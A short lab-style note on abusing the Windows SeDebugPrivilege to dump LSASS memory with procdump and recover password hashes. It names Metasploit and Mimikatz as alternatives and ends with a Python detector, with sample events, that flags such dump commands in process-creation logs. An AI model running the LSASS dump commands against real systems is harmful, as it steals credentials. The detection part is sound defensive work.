SeDebugPrivilege

We can abuse SeDebugPrivilege to dump the LSASS process and recover password hashes from it.

C:\htb> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeDebugPrivilege                          Debug programs                                                     Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled

Now transfer procdump.exe to the victim and dump the LSASS process:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

You can also use the hashdump module in Metasploit, or Mimikatz, to do the same task.
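
On the detection side, the Procdump command line above is visible in process-creation logging. The following is an added example, not part of the original page: it assumes events exported as JSON lines with Sysmon Event ID 1 field names (UtcTime, User, Image, CommandLine), and the sample records are constructed. It covers only command lines that pass a dump-type switch and name lsass as the target.

```python
import json
import re

# Procdump switches that select a dump type: -ma (full), -mp (MiniPlus), -mm (mini).
DUMP_SWITCHES = {"ma", "mp", "mm"}
LSASS_NAMES = {"lsass", "lsass.exe"}

# Constructed sample records shaped like Sysmon Event ID 1 (process creation).
SAMPLE_EVENTS = r'''
{"UtcTime": "2024-01-01 10:00:01", "User": "LAB\\alice", "Image": "C:\\Windows\\System32\\whoami.exe", "CommandLine": "whoami /priv"}
{"UtcTime": "2024-01-01 10:02:17", "User": "LAB\\alice", "Image": "C:\\Temp\\procdump.exe", "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"}
{"UtcTime": "2024-01-01 10:05:40", "User": "LAB\\bob", "Image": "C:\\Tools\\procdump64.exe", "CommandLine": "\"C:\\Tools\\procdump64.exe\" /MA C:\\Windows\\System32\\LSASS.EXE out.dmp"}
{"UtcTime": "2024-01-01 10:09:03", "User": "LAB\\bob", "Image": "C:\\Tools\\procdump64.exe", "CommandLine": "procdump64.exe -ma notepad.exe notepad.dmp"}
'''


def split_args(command_line):
    """Split on whitespace, keeping double-quoted strings whole; lowercase everything."""
    return [t.strip('"').lower() for t in re.findall(r'"[^"]*"|\S+', command_line)]


def is_lsass_dump(command_line):
    """True when a dump-type switch and an lsass target both appear as arguments."""
    args = split_args(command_line)[1:]  # first token is the image path; it is not matched
    switches = {a[1:] for a in args if a.startswith(("-", "/"))}
    targets = {re.split(r"[\\/]", a)[-1] for a in args if not a.startswith(("-", "/"))}
    return bool(switches & DUMP_SWITCHES) and bool(targets & LSASS_NAMES)


def scan(json_lines):
    """Return (UtcTime, User, CommandLine) for every event that matches."""
    hits = []
    for line in json_lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if is_lsass_dump(event.get("CommandLine", "")):
            hits.append((event["UtcTime"], event["User"], event["CommandLine"]))
    return hits


if __name__ == "__main__":
    for utc, user, cmd in scan(SAMPLE_EVENTS):
        print(f"{utc}  {user}  {cmd}")
```

Because the output file name (lsass.dmp) is not treated as a target, a dump of another process written to a file with that name does not match.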
